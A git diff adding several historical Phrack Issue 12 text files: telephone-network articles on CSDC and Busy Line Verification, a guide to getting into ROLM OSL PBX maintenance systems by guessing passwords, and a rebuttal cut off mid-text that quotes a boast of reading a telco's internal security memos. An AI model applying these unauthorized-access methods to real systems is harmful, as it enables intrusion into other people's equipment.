/\ --------------- Board lose:Oryan Quest /\
|
||||
<[]>==========================================<[]>
|
||||
\/ \/
|
||||
|
||||
Preface:
|
||||
========
|
||||
|
||||
This is the second part of my CSDC (Circuit Switched Digital Capability)
|
||||
series, the first being in PHRACK X. It is suggested that you read the first
|
||||
part and also the file on PACT in PHRACK XI. If I feel the material was not
|
||||
covered completely, I will make a third addition to this file.
|
||||
|
||||
|
||||
Hardware Interfaces
|
||||
===================
|
||||
|
||||
A NCTE or equivalent network interface equipment, located on the customer
|
||||
premises, is required to provide the CSDC feature for a customer. The NCTE or
|
||||
an equivalent circuit, located on the customer's premises, is required to
|
||||
provide TCM (Time-Compression-Multiplexing) transmission on the 2-wire
|
||||
subscriber loop. The NCTE also has a remote loopback for testing from CSDC
|
||||
central office.
|
||||
Dedicated 2-way CSDC trunk circuits are provided via DCT (Digital Carrier
|
||||
Trunk) combined alternate data/voice (CADV) units with DCT supervision. MF and
|
||||
CCIS signalling is allowed on these trunks. They provide signalling, switching
|
||||
and trunking functions between 1A ESS switch and other CSDC offices. To
|
||||
provide CSDC, the DCT bank must be equipped with alarm and digroup control
|
||||
units. A Digital Office Timing Supply (DOTS) is needed to provide network
|
||||
synchronization for the CSDC feature. A minimum of 3 CSDC maintenance circuits
|
||||
are needed for the CSDC feature to operate. The circuit provides digital
|
||||
signals for testing CSDC trunks and loops. They also provide a test
|
||||
termination for incoming CSDC calls. If an office has superimposed ringing for
|
||||
4 and 8 party lines, these ringing circuits may be used for loop testing with
|
||||
the maintenance circuit.
|
||||
|
||||
Remote Switching System
|
||||
=======================
|
||||
The RSS remote frame contains eight special service slot positions that can be
|
||||
used for D4 type plug in units (basically allows the RSS to have CSDC
|
||||
abilities). This allows the CSDC TRXS (Time Compression Multiplexing Remote
|
||||
Subscriber Exchange) channel units to be housed in the RSS frame. The CSDC
|
||||
feature is provided via the RSS T1 carrier facilities. The T1 carriers for
|
||||
CSDC service terminate with position 1 and 0 at the RSS. A ringing and tone
|
||||
plant is required in the RSS office to ring the phones of special service
|
||||
channel unit subscribers.
|
||||
|
||||
|
||||
Operation of the CSDC
|
||||
=====================
|
||||
|
||||
An off-hook origination initiates the seizure of an originating register.
|
||||
A line translation is performed and the CSDC indicator is received from the
|
||||
Line Equipment Number Class (LENCL) and is stored in the register. A touch
|
||||
tone service receiver is connected to the line and dial tone is applied. Upon
|
||||
receiving a digit, dial tone is removed. If the first digit is a '#', digit
|
||||
collection is set up to collect 2 more digits. Upon receipt of the 2 digits
|
||||
(99), the PACT (Prefix Access Code Translator) is indexed via the dialed
|
||||
digits to determine what service has been requested. If the line cannot have
|
||||
CSDC, an error message is sent. The AB digits (carrier selection) are
|
||||
collected next. Once the AB digits have been determined to be valid, the CCOL
|
||||
(Chart Column) is received. The CCOL merely is a code to tell the PACT what is
|
||||
to be done. Once the AB digits and the CSDC CCOL is received, the original
|
||||
register is overwritten with the CSDC CCOL. The CSDC office then sends a bit
|
||||
down the line to tell the equipment that a CSDC call is being processed.
|
||||
The call is now reinitialized to appear as though no digits have been
|
||||
collected. Digit collection proceeds until the proper number of digits (7 to
|
||||
10) has been received. An AMA register is seized at the end of the dialing.
|
||||
The call is then routed according to the dialed digits on a CSDC outgoing
|
||||
trunk. Answer guard timing for CSDC calls is 800 ms. Upon answer, the answer
|
||||
time is recorded in the AMA register.
|
||||
An outpulsing trunk is seized and a POB is hunted. If an outgoing trunk
|
||||
and outpulsing device are needed, one will be hunted. Information on the trunk
|
||||
is stored and a transfer to the outpulsing routine (MF or CCIS) is done. A
|
||||
verification insures that both calling and called parties are CSDC allowed. If
|
||||
they are not, the call is routed to an Automatic Intercept Service (AIS).
|
||||
For MF outpulsing, a junior register is seized, the outgoing trunk is put
|
||||
into the proper states, and start pulsing signal detection is done followed by
|
||||
digit outpulsing. For CCIS, call processing is the same as a normal call but a
|
||||
CCIS continuity check is performed while on the on-hook state.
|
||||
For an incoming call, the CSDC bit from the Trunk Class Code (TCC) is
|
||||
stored in the incoming register and a CSDC count is pegged. Digit collection
|
||||
is performed and a terminating DN translation is performed. Ringing is applied
|
||||
normally and once it has been answered, the incoming trunk is put in the
|
||||
off-hook state to pass answer to the next office.
|
||||
Standard disconnect and trunk guard timing is performed on CSDC calls
|
||||
when the called or calling party goes off-hook after a talking path has been
|
||||
established.
|
||||
|
||||
|
||||
Standard CSDC Dynamics
|
||||
======================
|
||||
|
||||
Call forwarding codes dialed after the CSDC code result in reorder.
|
||||
|
||||
The Call waiting option is also suspended when a CSDC call is in progress.
|
||||
Busy tone is given to POTS call that terminates to a CSDC connection. Busy
|
||||
tone is also given to a calling CSDC party if it encounters a busy line.
|
||||
|
||||
In order to have a 800 CSDC feature, the office must have CCIS INWATS ability
|
||||
in the OSO (Originating Screening Office).
|
||||
|
||||
Dialing 911 after the CSDC code is allowed, but 411/611 calls are routed to
|
||||
error messages.
|
||||
|
||||
|
||||
NCTE (Network Channel Terminating Equipment)
|
||||
============================================
|
||||
|
||||
As covered in Part 1, the NCTE is the equipment that you need to have CSDC.
|
||||
The NCTE is a piece of hardware that is connected to the CO loop and a
|
||||
terminal. On the terminal, there are 8 jacks for 8 pins on the NCTE. The
|
||||
functions of each pin are as followed.
|
||||
|
||||
1 - TRANSMISSION DATA
|
||||
2 - TRANSMISSION DATA
|
||||
3 - MODE CONTROL
|
||||
4 - MODE CONTROL
|
||||
5 - TIP VOICE
|
||||
6 - RING VOICE
|
||||
7 - RECEIVED DATA
|
||||
8 - RECEIVED DATA
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
This ends PART II of the CSDC series. Since Taran King was in such a hurry, I
|
||||
will finish the 3rd file with SCCS integrations, loop structure and RSS
|
||||
structures.
|
||||
|
||||
If you have any questions about this file or any other file, please leave me a
|
||||
message on either...
|
||||
|
||||
Phreak KlassRoom 2600 = 806-799-0016 LOGIN:EDUCATE
|
||||
|
||||
My Voice Mail Box = 214-733-5283
|
209
phrack12/7.txt
Normal file
209
phrack12/7.txt
Normal file
|
@ -0,0 +1,209 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #7 of 11
|
||||
|
||||
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
|
||||
\ /
|
||||
/ Hacking : OSL Systems \
|
||||
\ /
|
||||
/ Written by Evil Jay \
|
||||
\ /
|
||||
/ (C) 1987/88 Evil Jay \
|
||||
\ /
|
||||
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
|
||||
|
||||
|
||||
|
||||
Prologue:
|
||||
|
||||
|
||||
This file is for all those people who are running across the OSL system
|
||||
and are constantly confused about getting in and what to do once you're in.
|
||||
Because of the trouble I had getting a manual on the system from ROLM, I
|
||||
was forced to write this file from what I already know, and what I can do
|
||||
on the few systems I have gained access to. Since this file is far from
|
||||
complete (without a manual, most are), I'll leave it to you, to write up
|
||||
future files on the OSL system. Credit goes to Taran King who got me
|
||||
interested in writing the file, and who tried to help me get a manual (my
|
||||
social engineering leaves something to be desired).
|
||||
|
||||
|
||||
What is OSL:
|
||||
|
||||
Actually it has been termed as Operating Systems Location, Off Site
|
||||
Location and a lot of other names. Which? I'm not sure. What I can tell
|
||||
you is that it's an operating system running on an IBM (?) that does
|
||||
remote maintenance operations on a ROLM PBX (Referred to as CBX I
|
||||
believe). As I said, this file is not too complete, and I was unable to
|
||||
get very much information about the system, or the PBX system itself. I
|
||||
believe Celtic Phrost wrote a file on ROLM PBX systems, and you might want
|
||||
to read that or other ROLM files for more information.
|
||||
|
||||
|
||||
|
||||
Getting In:
|
||||
|
||||
If you have trouble logging in, try changing your parity. Also, this
|
||||
system will only except uppercase. The first thing you should see when you
|
||||
get a carrier is the following:
|
||||
|
||||
|
||||
|
||||
MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47
|
||||
RELEASE 8003
|
||||
OSL, PLEASE.
|
||||
?
|
||||
|
||||
|
||||
MARAUDER10292 is the system identification. Most of the time, this will
|
||||
be the name of the company running the OSL system, but occasionally you
|
||||
will find a system, you will not be able to identify. CN/A it. It might be
|
||||
your only chance of gaining access to that particular system.
|
||||
|
||||
01/09/85. This is a mystery to me. It could be the time that the system
|
||||
first went up (but sounds unlikely), the date of the current version of
|
||||
the OSL operating system...etc.
|
||||
|
||||
The ^G is a Control-G, and rings a bell at your terminal. I do not know
|
||||
why, but it does...
|
||||
|
||||
The rest of the text on that line is the current time and date.
|
||||
|
||||
RELEASE 8003 could be, again, the revision number of the software
|
||||
package. I don't know.
|
||||
|
||||
OSL PLEASE means that you can now attempt to login.
|
||||
|
||||
The ? is your prompt. Remember the uppercase only. Naturally we are
|
||||
going to type "OSL" to login. Once this is done, we will receive this
|
||||
prompt:
|
||||
|
||||
KEY:
|
||||
|
||||
This is the password prompt, and so far as I can tell, can be anything
|
||||
up to, say, 20 characters long. Obviously we are going to try MARAUDERS or
|
||||
MARAUDER as a password. Here's the tricky part. Some systems do not tell
|
||||
you whether the password was right or not. Sometimes, if it's right, you
|
||||
will get a ? prompt again. If not, you will get an ERROR msg. It depends
|
||||
on the system. Each system is set up a different way. Also, some systems
|
||||
require all alphabetics, while others require alphanumerics and sometimes
|
||||
they will require both. Again, you may or may not get an ERROR message.
|
||||
You can ABORT anything at any time by sending a BREAK. One good thing
|
||||
about the system is that you have, so far as I can tell, unlimited
|
||||
attempts at guessing the "KEY". Also, Druidic Death says that "," is a
|
||||
default, or is commonly used (I don't remember which). Unfortunately, I
|
||||
have never been able to get this to work myself.
|
||||
|
||||
|
||||
Your IN!:
|
||||
|
||||
Okay, first thing we need to do is type HELP. If you have access, which
|
||||
again, differs from system to system, you will get a menu that looks like
|
||||
so. (Maybe not, but I am through telling you how strange this system is.)
|
||||
|
||||
|
||||
|
||||
PLEASE ENTER ONE OF THE FOLLOWING COMMANDS
|
||||
|
||||
LREP - DISPLAY REPORT MENU
|
||||
LST - LIST REPORT COMMANDS CURRENTLY STORED
|
||||
ACD - ADD AN ACD COMMAND
|
||||
DEL - DELETE AN ACD COMMAND
|
||||
MOD - MODIFY AN ACD COMMAND
|
||||
SUS - SUSPEND AN ACD COMMAND
|
||||
ACT - ACTIVATE AN ACD COMMAND
|
||||
|
||||
|
||||
LREP: This lists a menu of reports you can view.
|
||||
|
||||
LST : This lists all the commands that have been stored in the buffer.
|
||||
|
||||
ACD : This activates a command.
|
||||
|
||||
DEL : This deletes a command in the buffer.
|
||||
|
||||
MOD : This modifies a command in the buffer.
|
||||
|
||||
SUS : This suspends a command in the buffer.
|
||||
|
||||
ACT : This activates a command in the buffer.
|
||||
|
||||
|
||||
Commands Explained:
|
||||
|
||||
Okay, so now we'll go through all of these commands and show you what they
|
||||
do, and of course, explain each example.
|
||||
|
||||
|
||||
LREP:
|
||||
|
||||
LREP lists a number of reports which can be ran. Here is an example:
|
||||
|
||||
|
||||
REP# NAME SYNTAX
|
||||
---- ---- ------
|
||||
1 - CURRENT STATUS ACD 1,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
2 - CUMULATIVE STATUS ACD 2,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
3 - TRUNK DISPLAY GROUP ACD 3,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
4 - POSITON PERFORMANCE ACD 4,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
5 - ABBREVIATED AGENT ACD 5,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
6 - DAILY PROFILE ACD 6,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
7 - CUMULATIVE AGENT ACD 7,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
|
||||
|
||||
|
||||
Current Status : Gives you the current status of the PBX system.
|
||||
Cumulative Status: Quite obvious.
|
||||
Trunk Display Grp: Obvious again.
|
||||
Position Prfrmnce: ???
|
||||
Abbreviated Agent: ???
|
||||
Daily Profile : Gives you a report of how the PBX ran on date 00/00/00.
|
||||
Cumulative Agent : ???
|
||||
|
||||
|
||||
ACD:
|
||||
|
||||
I purposely skipped all the other commands, since they are pretty obvious.
|
||||
They all have to do with adding commands to the buffer, modifying them and
|
||||
running them..etc. If you get access to a system, it would be wise to LST
|
||||
all of the commands that the operators have been running and then try them
|
||||
yourself. No biggy, but oh well. The ACD command activates a command and
|
||||
lists the desired report on your terminal. While the whole thing can be
|
||||
typed on one line, you can just type ACD <REPORT NUMBER> <CR> and do it
|
||||
step by step (a little easier to get the hang of it). Now we'll go through
|
||||
this, and show you an example of building a command to list the Trunk
|
||||
Display Report.
|
||||
|
||||
|
||||
?ACD 3
|
||||
<CTRL-G>FIRST GP OR AGENT ID: (Try 1)
|
||||
<CTRL-G>LAST GP OR AGENT ID: (Try 2)
|
||||
START TIME: (Enter START TIME in army time such as 22:52:00)
|
||||
INTERVAL: (Not sure, hit return)
|
||||
# OF INTERVALS: (Not sure, hit return)
|
||||
CLEAR(Y/N): (Type Y, but this is stored in the last cleared log)
|
||||
REPEAT DAILY?: (No!)
|
||||
PRINT LAST CLEARED(Y/N): (Here's where the last cleared shows up)
|
||||
|
||||
It then prints out the command and executes it, showing you the desired
|
||||
report.
|
||||
|
||||
|
||||
The end result:
|
||||
|
||||
Some other things can be done, such as commands like C and M and a host
|
||||
of others, but unfortunately, as I said, these systems are very strange
|
||||
and it's hard to find two alike. The computer is not worthless, and
|
||||
lots of things can be done on it, but this file is getting quite lengthy.
|
||||
If there is enough demand, I will write a follow-up. In the meantime, if I
|
||||
have made any mistakes, or you have more knowledge that you would like to
|
||||
share with me, I can be reached on the following boards:
|
||||
|
||||
ShadowSpawn Private, Hell Phrozen Over, Phantasie Realm and a few others.
|
||||
|
||||
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
|
||||
\ /
|
||||
/ An Evil Jay/Phrack, Inc. \
|
||||
\ /
|
||||
/ Presentation \
|
||||
\ /
|
||||
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
|
180
phrack12/8.txt
Normal file
180
phrack12/8.txt
Normal file
|
@ -0,0 +1,180 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #8 of 11
|
||||
|
||||
BUSY LINE VERIFICATION PART II
|
||||
|
||||
WRITTEN BY PHANTOM PHREAKER
|
||||
|
||||
|
||||
This file is meant to be an addition to the first file that was included
|
||||
in Phrack Inc. Issue XI. It is assumed that the reader has read and understood
|
||||
the previous file. Most of this information will be taken from Bell System
|
||||
Publications so you don't have to worry about it being incorrect.
|
||||
|
||||
First off, I'd like to correct a minor error included in the first file. I
|
||||
use the format 'KP+0XX+PRE+SUFF+ST' to show the MF routing that is used. This
|
||||
is not correct AT&T syntax though, the correct format is KP+0XX+NXX+XXXX+ST.
|
||||
This is minor detail, but some people are very picky.
|
||||
|
||||
The Verification Network
|
||||
------------------------
|
||||
|
||||
In a TSPS office, a verification circuit is associated with a 4-wire
|
||||
OutGoing Trunk (OGT) and a 3-way/4-wire bridging repeater arrangement. This is
|
||||
the circuit that does the speech scrambling. The speech and other tones (like
|
||||
busy and re-order) are frequency shifted, but are still recognizable by a TSPS
|
||||
operator.
|
||||
|
||||
TSPS verification trunks are connected via dedicated lines to incoming
|
||||
verification trunks in a toll office. The toll office provides either a link
|
||||
to an outgoing trunk and dedicated facilities to another toll office, or an
|
||||
outgoing toll connecting trunk and dedicated facilities to an incoming
|
||||
verification trunk in a local office. Each toll office has ways to check the
|
||||
security of verification trunks. In electronic toll offices (ESS offices), two
|
||||
independent office data translations provide security of the trunk. Electro-
|
||||
mechanical toll offices (Such as a CrossBar Tandem (XBT)) use an electrical
|
||||
cross-office check signal or a segregated switching train to control trunk
|
||||
connections. Verification trunks relay supervisory signals (such as answering
|
||||
supervision) to TSPS from the line being verified. Also, if verification
|
||||
trunks are busy, the TSPS operator will receive a re-order.
|
||||
|
||||
The functions of the VFY key
|
||||
----------------------------
|
||||
|
||||
When the operator presses the VFY key, several checks are made upon the
|
||||
number that has been entered. These are:
|
||||
A Check to see if the line is within the verification network accessible
|
||||
by that particular TSPS. If the line is not, the VFY key will flash.
|
||||
|
||||
A check to see if the owner of the line wishes BLV to be possible or not.
|
||||
If the line is something like a police emergency line, then the VFY key will
|
||||
flash, similar to the first check.
|
||||
|
||||
Important TSPS keys
|
||||
-------------------
|
||||
|
||||
When the VFY lamp lights steady (doesn't flash), indicating the process is
|
||||
acceptable, the operator puts the calling customer on hold and accesses an
|
||||
idle loop on the operator position. The ACS (Access) lamp lights steady if a
|
||||
verification trunk is available at that time. Then, the operator presses the
|
||||
ST key which sends out the complete number to be verified, in MF. The
|
||||
verification circuit activates, and the operator listens for scrambled speech
|
||||
and also watches the CLD (Called) lamp on her console. The CLD lamp is lighted
|
||||
when the operator loop was accessed, and will remain lit if the line being
|
||||
verified is on-hook. The operator has two ways of seeing if the line is in
|
||||
use, by listening, and by watching the CLD lamp. If the CLD lamp light goes
|
||||
out, then the line is off-hook.
|
||||
|
||||
If a successful BLV/EMER INT is performed, the operator presses the REC
|
||||
MSG MSG (Record Message) key, which completes the verification. If the EMER
|
||||
INT lamp is lit, the charges for the interrupt and the verification are
|
||||
automatically billed. If the VFY key is pressed twice, it indicates the
|
||||
verification should not be billed. This could be due to a customer error or a
|
||||
customer disconnect.
|
||||
|
||||
Charging capabilities
|
||||
---------------------
|
||||
|
||||
A customer can pay for a BLV/EMER INT in several ways. They can have the
|
||||
charges put on their phone bill, if they are calling from their home, they can
|
||||
bill the charges to an AT&T Calling Card, or pay directly from a coinphone.
|
||||
Details of the BLV/EMER INT function are recorded on AMA tape, which is later
|
||||
processed at the RAO (Revenue Accounting Office).
|
||||
|
||||
The classes of charge are as follows: STATION PAID, which means exactly
|
||||
what it says, STATION SPECIAL CALLING, in cases where billing is handled by a
|
||||
Calling Card or third number billing, and NO AMA, in unusual billing cases.
|
||||
|
||||
Also, for BLV/EMER INT calls that originate from a hotel, TSPS can send
|
||||
charges to HOBIS (Hotel Billing Information System), HOBIC (Hotel Billing
|
||||
Information Center), or a TTY at the hotel.
|
||||
|
||||
AMA records for BLV/EMER INT are recorded in basically the same format
|
||||
that normal calls are recorded. The only difference is that a numeric data
|
||||
group is added. The leftmost digit in the data group is a 1 if only a BLV was
|
||||
done, but it is a 2 if both a BLV and an EMER INT were done. In case of an
|
||||
aborted BLV, the billing record is marked 'No charge'.
|
||||
|
||||
Inward Operator differences
|
||||
---------------------------
|
||||
|
||||
When an Inward operator does BLV/EMER INT, the class of charge is always
|
||||
NO AMA, because billing is handled at the local TSPS site. Inwards also do not
|
||||
use the REC MSG key when a TSPS would, they use the VFY key in it's place.
|
||||
|
||||
The Speech scrambling technique
|
||||
-------------------------------
|
||||
|
||||
The speech scrambling technique that exists to keep the customers privacy
|
||||
intact is located in the TSPS console, and not in the verification trunks. The
|
||||
scrambling technique can only be deactivated by an operator pressing the EMER
|
||||
INT key, or a craftsperson using the console in a special mode. When the
|
||||
scrambler is deactivated by an operator doing an EMER INT, the customer hears
|
||||
an alerting tone (as mentioned in the first BLV file) made up of a 440Hz tone.
|
||||
This tone is initially played for two seconds, and then once every ten seconds
|
||||
afterwards until the operator presses her Position Release (POS RLS) key.
|
||||
|
||||
Operator trouble reporting
|
||||
--------------------------
|
||||
|
||||
When operators have trouble in handling a call, they can enter trouble
|
||||
reports that are technically called 'Operator keyed trouble reports'. These
|
||||
cause messages to be printed on the maintenance TTY and on the trouble report
|
||||
TTY channel. There are different trouble codes for different things, such as
|
||||
trouble with the speech scrambler, trouble in the verification network, or
|
||||
trouble in collecting charges from a customer.
|
||||
|
||||
In my area there are 20 such TSPS trouble codes. These are done in MF.
|
||||
They are entered with the KP TRBL (Key Pulse Trouble) key followed by a two
|
||||
digit trouble code followed by an ST. A trouble code for beeper trouble could
|
||||
be entered as KP TRBL+62+ST, and speech scrambler trouble could be KP
|
||||
TRBL+89+ST. Some of the other reasons for trouble codes are: Crosstalk, No
|
||||
ring, Noisy, can't hear, improper supervision toward the called and calling
|
||||
parties, cutoff, positions crossed, coin collecting trouble, third re-order,
|
||||
distant operator no answer, echo, data transmission, no answer supervision, ST
|
||||
key lit for more than 4 seconds, and others for person-to-person and
|
||||
station-to-station completed collect calls.
|
||||
|
||||
Maintenance and traffic measurements
|
||||
------------------------------------
|
||||
|
||||
These reports can be output from a maintenance or engineering and service
|
||||
data TTY, daily or hourly. Each daily report contains data for the previous
|
||||
day. Some traffic counts are as follows:
|
||||
Total Verification attempts, VFY key depressions, VFY key depressions when
|
||||
the requested number is out of TSPS range, VFY key depressions in which the
|
||||
requested number wasn't verifiable, BLV trunk seizures which pass an
|
||||
operational test, and EMER INT attempts. Other traffic counts include the
|
||||
measurements for usage of BLV trunks, the amount of time BLV trunks were
|
||||
unavailable, and the number of times BLV trunks were seized.
|
||||
|
||||
|
||||
I hope this file has helped people further understand how the BLV system
|
||||
works. If you haven't read part I, get a copy of Phrack Inc. Issue XI and read
|
||||
file #10.
|
||||
|
||||
As said earlier, most of this information comes directly from Bell System
|
||||
Publications and so it should be viewed as correct. However, if you do find
|
||||
any errors then please try to let me know about them so they can be corrected.
|
||||
|
||||
Suggested reading
|
||||
-----------------
|
||||
|
||||
TSPS Part I: The console-Written by The Marauder, LOD/H Technical Journal
|
||||
Issue No. 1, file #4
|
||||
|
||||
Busy Line Verification-Phrack Issue XI, file #10
|
||||
|
||||
Busy Verification Conference Circuit-Written by 414 Wizard
|
||||
|
||||
Verification-TAP issue 88, Written by Fred Steinbeck
|
||||
|
||||
Acknowledgements
|
||||
----------------
|
||||
Bell System Technical Journal, Vol. 59, No 8.
|
||||
Bell Labs RECORD periodical
|
||||
|
||||
And the following people for contributing information in some form:
|
||||
|
||||
Mark Tabas, Doom Prophet, The Marauder
|
240
phrack12/9.txt
Normal file
240
phrack12/9.txt
Normal file
|
@ -0,0 +1,240 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #9 of 11
|
||||
|
||||
Rebuttal to Phrack Issue 8 and 11 (File 11)
|
||||
Written by Scan Man.....
|
||||
|
||||
It has been requested of Taran King (Who doesn't agree with KL on this subj)
|
||||
to put this somewhere in the next issue of Phrack (12) for proper
|
||||
distribution. Whether he does or not I cannot say.
|
||||
|
||||
|
||||
Well a number of months have gone by now and I have been written about
|
||||
accused of and had rebuttals written for me, all of which were about as clear
|
||||
and factual as mud. And that includes the rebuttal that Telecomputist has in
|
||||
effect tried to stand with me, and making matters only worse by inaccurate
|
||||
information. But then all of this started with inaccurate information from
|
||||
PWN, didn't it. KL has resorted to interfering in other peoples lives in order
|
||||
to promote his so called news publication. To this I say, if you are going to
|
||||
call it news then make it facts. I can buy the Enquirer if I want sensational-
|
||||
istic readership boosting and inflated gossip. You do no justice to yourself
|
||||
or your publication. I really shouldn't dignify any of this with comment but
|
||||
shall as the entire matter has been blown so far out of proportion and since I
|
||||
have been phreaking since these kiddies were still messing their diapers I
|
||||
feel it a little more than an inconvenience, particularly since these
|
||||
gentlemen (and I use the term loosely) can't seem to accomplish anything but
|
||||
guesswork and conjecture and have cost me (and my wife and son) a $50,000 job
|
||||
so the least I can do is get a few FACTS out.
|
||||
|
||||
First, I was (and I stress was) employed by a company called Telecom
|
||||
Management Corporation. Notice the initials of this company (TMC). Telecom
|
||||
Mgnt is a management company, and a management company manages other
|
||||
companies. Among the companies it manages are 6 TMC Long Distance markets
|
||||
(none of which are in Vegas), two of which are in Charleston where I live and
|
||||
NY where I worked (up until two snotty nose teenagers (KL & SR) decided to
|
||||
stick there nose where didn't belong). At any rate I was hired and paid by
|
||||
Miami, lived in Charleston, and worked in NY. And yes with regard to your "he
|
||||
must have been quite an asset to them," I was an asset to them. And KL you
|
||||
seem to think it was surprising that they flew me to NY every week. I don't,
|
||||
and I'm sure the other 100 businessmen on my flights who I traveled with
|
||||
regularly would be surprised that they carried the unique distinction of being
|
||||
somehow in the wrong for having their companies send them to NY every week.
|
||||
I'll have to tell them this one for a good laff next time I get a 50,000
|
||||
dollar a yr job that sends me to NY. Moving right along, I will add that I was
|
||||
employed as a Systems Analyst. When I was originally hired, my interview was
|
||||
by a fellow from Miami (Telecom Mgnt) and the interview was conducted in the
|
||||
Chas office (one of the few times I was ever in there). This however doesn't
|
||||
explain why Pauline Frazier and Ben Graves knew me or didn't care for me. The
|
||||
reason for this was quite simple: they both knew about me and the bulletin
|
||||
board and had also been trying to catch me stealing calls from there company
|
||||
(don't know where they ever got that idea <grin>). At any rate they obviously
|
||||
were quite unhappy because I got that job.
|
||||
|
||||
The next comment in rebut to Telecomputist which was a rebut to PWN Phrack
|
||||
Issue 8 (what a nightmare), was, and I quote, "I claimed not to have any ties
|
||||
with Vegas but didn't claim not to have ties with TMC." Boy talk about factual
|
||||
journalism, really grabbing for straws aren't you. Anything to make me look
|
||||
bad huh? Wonder why. Wouldn't be for more copies for your next issue would it?
|
||||
As you could see at the beginning of this rebuttal I clearly stated that
|
||||
Telecom Management ran 6 TMC markets as well as other companies and that they
|
||||
were connected but separate from each other. Although none of it is relevant
|
||||
to any of this, but that doesn't matter when you are out to get copies for
|
||||
your next issue does it KL. At any rate this also shows where Telecomputist,
|
||||
although trying to do a good thing, got their facts mixed up too by
|
||||
misunderstanding the fact that Telecom Managements initials were the same as
|
||||
TMC and were unrelated companies when actually they are.
|
||||
|
||||
In you next comments you say, "The rest of my statements are highly debatable"
|
||||
(might try looking at a few (no make that all) of your own). You also said
|
||||
that my statements have no proof (as if yours are so damn factual). First, I
|
||||
don't have to prove a thing to assholes like you or anyone else for that
|
||||
matter. You also state your decision (as if you have the right to make any
|
||||
decisions about me, (shit boy you don't even know me, but you may soon) was to
|
||||
do nothing because of lack of proof. And you call what you came up with truth?
|
||||
Based on what, your vast personal knowledge of me, your knowledge of something
|
||||
some phone phreak told you, because of having worked with me? As for providing
|
||||
more ammunition to the idea, I'm not what I claim to be. I have claimed to be
|
||||
nothing, it's you doing all the claiming. And there is no "ammunition" to be
|
||||
had from the Telecomputist article as it was about as accurate as yours have
|
||||
been. Shows you what two people who know nothing about nothing can do if they
|
||||
put their minds to it. I might add that this is the first and last statement I
|
||||
have personally written that has anything to do with any of this. You also
|
||||
stated that, "after three months you had proof," yet you have shown only
|
||||
words, not a speck of proof or truth. You have taken the Telecomputist article
|
||||
apart and tried every way there was to tear it apart, most of which was
|
||||
guesswork and innuendo. Examples of this are your quotes of, "Gee isn't that
|
||||
awful expensive," "Notice how he didn't say he had no ties with TMC,"
|
||||
"Statements were highly debatable," "Now that he has had a few months to come
|
||||
up with a story," etc., that's some real facts there KL, you're a real
|
||||
journalist who deals only with facts. You're not out for gossip or character
|
||||
assassination. Riiiiiight. I've just been waiting for you to put your foot in
|
||||
your mouth (in this case both feet). (Don't worry, I'm sure they will fit
|
||||
nicely)
|
||||
|
||||
I think it's also time to tell the story of how all this got started. It's
|
||||
really a comedy of errors (only I'm not laffing). As I stated earlier I was
|
||||
paid by Miami, as that's where the home office was. This meant that on
|
||||
occasion I also went to Miami as well as NY. In Dec of 85 I learned of a new
|
||||
organization being formed called the CFCA (Communications Fraud Control
|
||||
Association) although in addition to communications, they support computer and
|
||||
credit security as well. Knowing that all the top security people were going
|
||||
to be there and being a good phone phreak on the eternal quest for inside
|
||||
knowledge, I wanted in on this conference which was held the 6th, 7th and 8th
|
||||
of Feb 86 in Miami. Soooooo I convinced Telecom that we should check these
|
||||
People out for some benefit to our company with regard to my job (Systems
|
||||
Analyst) as after all it was my job to not only develop and operate the
|
||||
companies' computers but keep them secure as well. So I had had the perfect
|
||||
excuse to get me in the conference. They agreed with me and went for it and
|
||||
paid for my flight down there and the conference fee. Moving right along, it
|
||||
was the 1st day into the conference when just at lunch I was talking to a guy
|
||||
from Pac NW Bell named Larry Algard (whose name I had forgotten til Sally Ride
|
||||
showed up on the BBS saying Larry the Algardian had sent me a couple of weeks
|
||||
later). At any rate while talking to this guy, a security agent from one of
|
||||
the other LD companies that was there came up and said, "Aren't you Scan Man,
|
||||
the guy that runs P-80?" Needless to say I about shit, and had to come up with
|
||||
a damn good answer in about a 100th of a second. Knowing I was there legally
|
||||
with the authority of my company, I answered back (in front of Larry Algard),
|
||||
"Yes, but unbeknownst to my members it's an undercover board for TMC the
|
||||
company I work for." And since Telecom Management Corporations initials were
|
||||
TMC and they did manage 6 TMC LD companies I knew I was safe if he decided to
|
||||
check me out, which I was worried about because earlier this same guy (the one
|
||||
that said, "Aren't you Scan Man") had made a comment about the security of the
|
||||
meeting and that he believed hackers had infiltrated the meeting. At any rate,
|
||||
I was out of the fire with this guy and everyone (about 7 others) standing
|
||||
around in our circle. It does however get worse. Two weeks later I got a new
|
||||
user on the board named Sally Ride saying, "Larry The Algardian sent me" and
|
||||
the msg subj was titled Scott Higginbotham. I answered the msg asking him
|
||||
where he got that name (Scott Higginbotham, my real name) but he thought I
|
||||
meant where did he get the name Larry the Algardian (see msg reprint below).
|
||||
His reply is as follows (actual copy of msg)
|
||||
|
||||
Scan Man, I got the name from an electronic memo from Sec. Mgr. Larry Algard
|
||||
to his boss, George Reay. Since I've access to these files via PNB's UNIX AOS,
|
||||
I read about Algard's meeting with Scott at a CFCA Conf. in Miami. It's nice
|
||||
to be able to know what the other side is up to, but how did you infiltrate
|
||||
CFCA? I was able to infiltrate PNB Sec. thru their own system. But, to attend
|
||||
such a meeting of the toll carriers of the nation and learn their plans to
|
||||
combat us is a real coup! Understand where I'm coming from?
|
||||
Sally Ride:::Space Cadet
|
||||
|
||||
Now from this msg you can see two things: first that Sally Ride is a two faced
|
||||
little S.O.B., plus you can also see why he would think I was fed. I can
|
||||
